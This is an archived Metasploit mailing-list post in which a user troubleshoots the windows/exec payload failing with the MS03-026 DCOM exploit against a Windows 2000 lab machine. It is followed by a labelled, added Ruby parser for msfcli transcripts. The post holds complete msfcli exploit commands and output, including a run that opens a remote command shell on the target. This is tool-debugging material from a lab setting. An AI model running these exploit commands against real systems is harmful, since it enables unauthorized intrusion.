Metasploit mailing list archives

Re: windows/exec Payload problems.


From: a10n3.s7r1k3r at gmail.com (Kashif Iftikhar)
Date: Wed, 24 Jan 2007 13:34:19 +0000

Hello,

 I was trying to work with the command execute payload and I can't
seem to get it to work. I tested it on both 2.7 and 3.0 beta3 updated
via SVN. I am using ms03_026_dcom (the dcom RPC exploit).

 The system I am testing against is Windows 2000 Professional without
any SPs installed.

 Here is a sample of output using msfcli from 3.0

-------------------------------------------------------------------
root at S7R1K3R:/pentest/exploits/framework-3.0-beta-3$ ./msfcli "exploit/windows/dcerpc/ms03_026_dcom" PAYLOAD="windows/exec" CMD="md abc" RHOST="192.168.0.17" E
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0 at ncacn_ip_tcp:192.168.0.17[135]
...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0 at ncacn_ip_tcp:192.168.0.17[135]
...
[*] Sending exploit ...
Exploit failed: end of file reached
Backtrace:
./lib/rex/io/stream.rb:58:in `sysread'
./lib/rex/io/stream.rb:58:in `read'
./lib/rex/io/stream.rb:181:in `get_once'
./lib/rex/proto/dcerpc/client.rb:150:in `read'
./lib/rex/proto/dcerpc/client.rb:230:in `call'
./lib/msf/core/exploit/dcerpc.rb:97:in `dcerpc_call'
/pentest/exploits/framework-3.0-beta-3/modules/exploits/windows/dcerpc/ms03_026_dcom.rb:206:in `exploit'
./lib/msf/core/exploit_driver.rb:189:in `job_run_proc'
./lib/msf/core/exploit_driver.rb:152:in `run'
./lib/msf/base/simple/exploit.rb:118:in `exploit_simple'
./lib/msf/base/simple/exploit.rb:127:in `exploit_simple'
./msfcli:153



root at S7R1K3R:/pentest/exploits/framework-3.0-beta-3$ ./msfcli
"exploit/windows/dcerpc/ms03_026_dcom"
PAYLOAD="windows/shell/bind_tcp" RHOST="192.168.0.17" E
[*] Started bind handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0 at ncacn_ip_tcp:192.168.0.17[135]
...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0 at ncacn_ip_tcp:192.168.0.17[135]
...
[*] Sending exploit ...
[*] Sending stage (474 bytes)
[*] The DCERPC service did not reply to our request
[*] Command shell session 1 opened (192.168.0.21:58937 -> 192.168.0.17:4444)

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

C:\WINNT\system32>
-------------------------------------------------------------------------

 As can be seen, other payloads like bind shell work fine.

 Also, one other strange thing that I noticed is that with 2.7 I can
repeatedly exploit the same box and the service crashes after several
successful attempts, while with 3.0 I only get one attempt and after
one successful attempt the service no longer seems to be exploitable.

 Am I doing something wrong here or is it a bug? I am sorry if
someone else has already pointed this out.


 Regards,

Kashif.
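Added example, not code from the original post or from the Metasploit project: a small Ruby parser for msfcli console transcripts of the kind quoted above. It recovers the module, payload and RHOST from the (possibly mail-wrapped) command line, the DCERPC endpoint from the "Binding to" line, and classifies the run as a session, a failure (keeping the backtrace frames), or unknown. The two embedded transcripts are constructed from the post; the function and struct names are the example's own. One fact it relies on: "end of file reached" is the message of Ruby's EOFError, which `sysread` raises when the peer has closed the connection before the requested bytes arrived, so a failure with that text means the DCERPC response never came back.

```ruby
# Added example (not part of the original post or of Metasploit):
# parse msfcli transcripts and classify the outcome of each run.

Endpoint = Struct.new(:uuid, :version, :transport, :host, :port)
Frame    = Struct.new(:file, :line, :func)

# Transcript reconstructed from the post (constructed sample input).
SAMPLE_FAILED = <<~'LOG'
  root at S7R1K3R:/pentest/exploits/framework-3.0-beta-3$ ./msfcli
  "exploit/windows/dcerpc/ms03_026_dcom" PAYLOAD="windows/exec" CMD="md
  abc" RHOST="192.168.0.17" E
  [*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
  [*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0 at ncacn_ip_tcp:192.168.0.17[135]
  ...
  [*] Sending exploit ...
  Exploit failed: end of file reached
  Backtrace:
  ./lib/rex/io/stream.rb:58:in `sysread'
  ./lib/rex/io/stream.rb:58:in `read'
  ./lib/rex/proto/dcerpc/client.rb:150:in `read'
  ./msfcli:153
LOG

# Second transcript from the post, the run that produced a session.
SAMPLE_SESSION = <<~'LOG'
  root at S7R1K3R:/pentest/exploits/framework-3.0-beta-3$ ./msfcli
  "exploit/windows/dcerpc/ms03_026_dcom"
  PAYLOAD="windows/shell/bind_tcp" RHOST="192.168.0.17" E
  [*] Started bind handler
  [*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0 at ncacn_ip_tcp:192.168.0.17[135]
  [*] Sending exploit ...
  [*] Sending stage (474 bytes)
  [*] Command shell session 1 opened (192.168.0.21:58937 -> 192.168.0.17:4444)
LOG

def parse_msfcli(text)
  result = { exploit: nil, payload: nil, rhost: nil, endpoint: nil,
             outcome: :unknown, error: nil, frames: [], session: nil }

  # The command may be wrapped across lines by a mail client, so the
  # option values are searched for in the whole text rather than per line.
  result[:exploit] = text[/"(exploit\/[^"]+)"/, 1]
  result[:payload] = text[/PAYLOAD="([^"]+)"/, 1]
  result[:rhost]   = text[/RHOST="([^"]+)"/, 1]

  if (m = text.match(/Binding to ([0-9a-f-]+):(\d+\.\d+) at (\w+):([\d.]+)\[(\d+)\]/))
    result[:endpoint] = Endpoint.new(m[1], m[2], m[3], m[4], m[5].to_i)
  end

  in_backtrace = false
  text.each_line do |raw|
    line = raw.strip.sub(/\A\[\*\] /, '')   # drop the "[*] " status prefix
    if (m = line.match(/\ACommand shell session (\d+) opened \((\S+) -> (\S+)\)\z/))
      result[:outcome] = :session
      result[:session] = { id: m[1].to_i, local: m[2], remote: m[3] }
    elsif (m = line.match(/\AExploit failed: (.+)\z/))
      result[:outcome] = :failed
      result[:error]   = m[1]
    elsif line == 'Backtrace:'
      in_backtrace = true
    elsif in_backtrace && (m = line.match(/\A(\S+):(\d+)(?::in `([^']+)')?\z/))
      # Frames look like "./lib/rex/io/stream.rb:58:in `sysread'" or "./msfcli:153".
      result[:frames] << Frame.new(m[1], m[2].to_i, m[3])
    end
  end
  result
end

# "end of file reached" is Ruby's EOFError message: sysread hit EOF, meaning
# the peer closed the TCP connection before a full DCERPC reply was read.
def peer_closed?(parsed)
  parsed[:outcome] == :failed && parsed[:error] == 'end of file reached'
end

# Innermost frame of a failure, e.g. "./lib/rex/io/stream.rb:58 sysread".
def innermost_frame(parsed)
  f = parsed[:frames].first
  f && "#{f.file}:#{f.line} #{f.func}"
end

if __FILE__ == $0
  [SAMPLE_FAILED, SAMPLE_SESSION].each { |log| p parse_msfcli(log) }
end
```

Run over a directory of saved msfcli logs, this turns a pile of transcripts into rows of (module, payload, target, endpoint, outcome), which makes it easy to see that every failure shares the same innermost frame and error text rather than re-reading each backtrace by hand.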


